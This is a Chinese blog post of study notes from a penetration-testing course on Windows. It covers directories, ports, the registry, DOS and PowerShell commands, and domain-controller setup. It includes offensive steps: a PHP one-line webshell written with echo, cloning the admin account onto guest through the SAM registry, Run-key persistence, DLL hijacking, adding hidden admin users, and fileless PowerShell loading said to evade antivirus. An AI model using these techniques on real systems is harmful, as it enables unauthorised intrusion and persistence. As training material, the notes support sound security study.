我學到了一下幾點
Windows系統目錄結構與滲透的作用
常見Windows的服務詳解
Windows埠詳解
常用的Windows注冊表詳解
hacker DOS命令詳解(net user / type /md /rd/ dir /cd /net use copy、批處理 等)
利用dos命令制作開機病毒
Windows性能優化詳解
Windows手動查找木馬并清理病毒
POWERSHELL(ps1腳本使用,常用滲透命令講解,powershell在內網滲透中的作用)
windows 域環境(域控搭建配置,域用戶組權限分析,域網路作業原理講解,域策略配置使用等)
1.系統目錄,服務,埠,注冊表
2.常用的DOS命令
3.POWERSHELL使用
4.域控環境搭建配置
主要是對系統目錄的了解
以后的流程:漏洞---后臺---getshell---執行命令操作---提權---內網 dos命令在執行命令往后用到的多,
powershell,nishang,empire,msf生成ps1
經常用到無檔案攻擊:不會往電腦里上傳檔案,通過遠程的服務器呼叫生成的ps腳本,加載到記憶體去運行,就會出現一個會話,對msf或者控制機上操作,無檔案攻擊是無法溯源的, 只有用bypass防護, 360等安全工具攔截也可以過,
域控環境搭建 成員pc加入域網路
01.系統目錄(安裝完成后08C盤)
windows:是windows系統的安裝目錄,并不是程式目錄,該目錄存放系統檔案資料,不要隨意去改動
windows下重要目錄
System32:屬于系統的組態檔,
cmd.exe,
sethc.exe呼叫粘貼,
config/SAM:SAM檔案里有系統的用戶名密碼,忘記密碼了可以用pe去清理SAM檔案,抹掉密碼
drivers/etc/hosts:hosts檔案決議優先級是高于DNS的,可以釣魚,欺騙,修改DNS檔案,繞過服務器軟體激活驗證
Program Files 64位程式目錄
Program Files (x86) 32位程式目錄
Perflogs :存放日記記錄(不是系統日志)
ProgramData:存放系統臨時生成的檔案夾和資料(隱藏目錄):rpp蠕蟲病毒會感染此目錄可以用殺毒軟體去著重掃描下這個目錄
用戶目錄:從3389進來會生成一個登陸用戶的檔案夾,檔案及里會配置一些資訊,用戶登錄可查看管理員一小部分桌面,最好用管理員登錄查看桌面可能會有idc賬號密碼資訊,資料庫臨時修改檔案等,以及被黑客留下的遠控,礦機等,
02.計算機服務
服務器有兩種服務:①本地服務②網路服務
①本地服務:隨便開個軟體也稱本地服務
②網路服務:可以通過ip給互聯網提供服務的叫網路服務
滲透測驗黑客的目的是拿到至高權限,拿到權限的途徑有哪些呢?
黑客通過網路訪問服務器首先是訪問的網路服務
A服務器可能開通的服務:web服務,資料庫服務,FTP服務,3389服務,1433服務
其中web服務漏洞多,搞得花樣也會多幾率機會大,例如owasp top10的漏洞,通過web服務區提權,拿到更多權限
網路服務漏洞(不包括WEB):
1.爆破(已知賬號windows:administrator,linux:root)爆破密碼即可,也能拿到最高權限
2.漏洞利用rdp,sib每隔一段時間都會出現相應漏洞(exp配合msf)進行漏洞利用 也能拿到權限
3.欺騙(dns欺騙,中間人攻擊) 也能拿到權限
4.釣魚(web釣魚,垃圾郵件,nishang提權釣魚)也能拿到權限
web服務
dns服務:域名決議ip,ip反向決議域名
dhcp服務:網埠有一個分發ip服務器
郵件服務:
telnet服務:把自己的cmd通過遠程呼叫,也可以用telnei去測驗他的埠開放情況
ftp服務:上傳下載
smb服務445:web鏈接和客戶端與服務器通信
rdp服務:遠程桌面
計算機埠:
計算機埠作用就是用來區分服務的,計算機通信是靠ip的
埠在默認情況下是不可以重復使用
埠范圍1-65535
資訊收集分析:
訪問hao123.com
打開檢查元素
Network---
找到www.hao123.com點擊
點擊Headers
找到請求和回應包
apache
探測FTP:
ftp ip地址
服務器版本系統分析:
iis7/7.8 08
iis8/8.5 12
iis10 2016
常見的埠
HTTP協議代理服務器常用埠號:80/8080/3128/8081/9080
https/443
FTP(檔案傳輸)協議代理服務器常用埠號:21
Telnet(遠程登錄)協議代理服務器常用埠:23
TFTP(Trivial File Transfer Protocol)默認埠號為69/udp
SSH(安全登錄),SCP(檔案傳輸),埠重定向,默認的埠號為22/tcp
SMTP Simple Mail Transfer Protocol (E-mail),默認埠號為25/tcp木馬Antigen、Email
Password Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都開放這個埠);
POP3 Post Office Protocol (E-mail) ,默認的埠號為110/tcp;
TOMCAT,默認的埠號為8080;
WIN2003遠程登陸,默認的埠號為3389;
Oracle 資料庫,默認的埠號為1521;
MS SQL*SERVER資料庫server,默認的埠號為1433/tcp 1433/udp;
QQ,默認的埠號為1080/udp
發現未知埠怎么辦?
1.baidu
2.nmap 識別埠指紋看服務
3.加載ip或者域名后面看下是不是網站
4.測驗是不是3389因為3389會經常被改掉
注冊表:
快速打開注冊表:regedit
第三個:HKEY_LOCAL_MACHINE用的比較多
注冊表克隆賬號:
打開第三個表---SAM--SAM(右鍵添加權限Administrators完全控制讀取)---重繪---Domains
---Users---查看Names里的aminisrxxx(管理員)采用的0x1f4十六進制---在找到000001F4雙擊“F”復制前4排以后的值,打開000001F5(來賓)的"F"值,粘貼到相同位置,
再給來賓賬號設定個密碼,這樣,來賓賬號就等于管理員賬號有了一樣的權限
開啟啟動(可以寫入東西)
注冊表HKEY_LOCAL_MACHINE---Microsoft---windows---CurrentVersion---Run---
Run---新建---字串值--填寫你要開機的啟動項,比其他地方稍微隱蔽些,開機的軟體也可能呼叫這個表
大多使用的黑方法
dll劫持,比如qq有很多dll檔案,執著一個dll特換掉qq的dll這樣每次打開qq就會生成一個shell
DOS命令
ping:
簡單的路由追蹤:tracert 目標網址
1 1 ms 2 ms 3ms 192.168.1.1 自己路由器
2 2 2 1 100.64.0.1 運用商的
3 3ms 4 3 58.42.150.13
tracert的作用
c段來說,假設14.215.177.1---14.215.177.254,如果目標的路由追中和c段里站的路由追中都是一樣的代表都在一個機房里,倒數第二個看也可以內網滲透會用到
比如tracert 14.215.177.1 回傳的路由數值都是一樣證明都是一個機房的
tracert 14.215.177.2
什么型別的站點可能會在一個c段?
大學,政府,醫院,機構等等一系列
ip:
ipconfig:主要查看ip和網關的
ipconfig /all:看的更全面詳細
ipconfig /release釋放ip
ipconfig /renew重新獲取ip
ipconfig /flushdns 清空DNS快取
systeminfo 查看系統資訊以及補丁,提權必備
arp -a 主要查看本地快取表 局域網通信是靠ARP快取表里的mac地址 可以看看局域網和你互動的主機
net view 查看局域網里其他計算機名稱
shutdown -s -t 180 -c "你還有180秒關機"
shutdown -a 取消關機
shutdown -r -t 180 -c "你還有180秒重啟"
dir:查看目錄下有哪些檔案目錄,其中顯示的.代表隱藏目錄
cd:切換目錄
cd\ 到c盤根目錄
d: 進入D盤
md 創建目錄 例如:md test 在用dir查看
rd 洗掉目錄 例如 rd test 在用dir查看
copy con 創建檔案 例如:copy con 123.txt copy con d:\123.txt (批處理也可以做)
start 圖形化查看檔案 例如:start 123.txt start www.baidu.com statr TOOS\TOOS\fanghan
type 命令列查看檔案 例如:type 123.txt
del 洗掉檔案 例如:del 123.txt
rd /S 洗掉檔案夾,檔案夾里有內容例如 rd /S test.txt
ren 原檔案名 新檔案名 重命名檔案名
copy 復制檔案 例如 copy 123.txt d:\
move 移動 例如 move 124.txt .
重點:內網滲透會用到
net share 查看共享
net share c$ /del 洗掉c盤共享
net use k:\\192.168.1.1\c$
net use k:\\192.168.1.1\c$ /del
net use k:/del洗掉鏈接
可以遠程執行命令以及批處理之類的
net time \\192.168.1.1
net start 查看開啟了哪些服務
net start 服務名 開啟服務;(如:net start telnet, net start schedule)
net stop 服務名 停止某服務 (如果服務中間有空格最好用引號引起來)
net user 用戶名 密碼 /add 建立用戶
net user 用戶名 查看詳細服務,詳細時間等
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net locaLGroup 查看組 每個組的功能點也是不一樣的
重點正常情況下遠程登錄必須是管理員 但如果把普通用戶也添加到*Remote Desktop Users 也可以登錄
重點,什么時候用,如果sqlserver拿到了sa權限可以遠程執行命令,因為權限是system權限,可以創建用戶,但是服務器卻有個安全狗,如果在創建net user 1 1 /add安全狗沒有攔截的話,就把1這個用戶添加到*Remote Desktop Users組里,在通過3389登錄,但是你不是最高權限,這時候,你把system的所有C,D盤的權限進行降權,從理解層面的意思上你的1已經是管理員權限了,變相提權,自己上不去,就把身邊的人拉下來,
net locaLGroup administrators 用戶名 /add 把“用戶”添加到管理員中使其具有管理員權限,注意:administrator后加s用復數
net user guest 12345 用guest用戶登陸后用將密碼改為12345
net password 密碼 更改系統登陸密碼
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 洗掉ipc$共享
net share c$ /del 洗掉C:共享
Tasklist 查看行程
Taskkill /im qq.exe /f 結束行程 切記并不是所有行程都得結束,即使最高權限,如果是system可以停止殺軟服務,但無法結束行程
Tracert 追蹤路由
Echo “”命令列寫入檔案 在命令執行以及匯入shell時候用的較多,
例如 echo "123132132" > 12331.txt,在查看type 12331.txt
重點:echo重點用在一句話,如:echo ^<?php @eval($_POST[a]);?^> > a.php ^是用來區分>的,
Query user 查看登錄用戶 實際情況你查看下真正的管理員有沒有登錄,登錄的話就不要亂操作,
Msg user “hello” 與其他系統賬號聊天
批處理檔案是dos命令的組合檔案,
寫在批處理檔案的命令會被逐一執行,
后綴名名.bat
新建批處理檔案
新建一個文本檔案保存時把后綴名改為bat
也可以使用命令
copy con 123.bat
net user cracer 123123 /add
net localgroup administrator cracer /add
Ctrl+z
回車
POWERSHELL
在08以后的服務器里會有,03是沒有的
如何運行程式、腳本和已有的軟體
在系統路徑下運行程式、腳本、批處理檔案或者其它可執行檔案,可以直接輸入檔案名運行,比如我把一個Test.cmd檔案放在了”C:\Windows\System32”下
如果檔案名字或路徑中有空格,需要用(')引號將命令擴起來,同時在前面加上符號(&)
要運行當前目錄下的命令,需要檔案名前加.\
除了支持傳統的Windows可執行檔案,PowerShell還推出了一個功能強大的新的命令叫做cmdlet,所有的cmdlet命令規則都遵循動詞-名詞這種語法結構,如Get-Command、Get-Content等,如下Get-Command命令意思是獲取包含Process的所有命令集合:
Get-command 獲取命令
Get-help get-service 獲取命令使用說明
獲取PowerShell版本資訊
Get-Host或$PSVersionTable
獲取當前PowerShell環境包含的Module
,Get-Module
Get-server 獲取計算機服務
POWERSHELL只是運行軟體要用的,有的時候不同模式下是無法運行的比如:
echo "heloo fanghan" > a.ps1
.\a.ps1 會報錯
Gte-Executionpolicy 查看模式, Restricted無法運行腳本檔案
設定只模式策略值:
①Set-Executionpolicy
②Executionpolicy:unrestricted
③Y
④在運行腳本
也可用bapss來繞過執行策略
域環境配置
域控制器
域控制器中包含了由這個域的賬戶、密碼、屬于這個域的計算機等資訊構成的資料庫,當電腦聯入網路時,域控制器首先要鑒別這臺電腦是否是屬于這個域的,用戶使用的登錄賬號是否存在、密碼是否正確,如果以上資訊有一樣不正確,那么域控制器就會拒絕這個用戶從這臺電腦登錄,不能登錄,用戶就不能訪問服務器上有權限保護的資源,他只能以對等網用戶的方式訪問Windows共享出來的資源,這樣就在一定程度上保護了網路上的資源,
第一步:比如在08搭建域,首先要有一個靜態IP,不能要動態,需要DNS的配置,,域控不能換ip,所以在搭建DNS最好也一樣
第二步: ncpa.cpl---本地連接屬性---internet協議版本ipv4---使用下面地址 192.168.194.138,DNS:192.168.194.138
第三部:運行里輸入dcpromo 打開了后下一步---在新林中建新域---起名fanghan.com---級別2008 R2---下一步---yes---還原密碼123.com---下一步等待安裝---自動重啟
第四部:重啟輸入密碼123.com----改密碼1234.com---稍后詢問---確定
第五步:03加入域,只需要設定一個dns
第六步:03下運行 ncpa.cpl---本地連接決議到域名即可---屬性---tcpip---DNS--192.168.194.138---確定---打開了防火墻,記得關閉
第七步:如果決議不了可能有快取---開始---我的電腦屬性---計算機名---更改---域---域名---確定---輸入08賬號密碼administrator 1234.com 會出現歡迎你加入---確定重啟
第八步:08下給03創建域用戶
net uesr xy 123.com /add
03重啟后,用戶名選項,使用域創建的用戶名登錄
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/442.html
標籤:其他
上一篇:【CTF】CTFHub 技能樹 彩蛋 writeup
下一篇:03.Linux基礎操作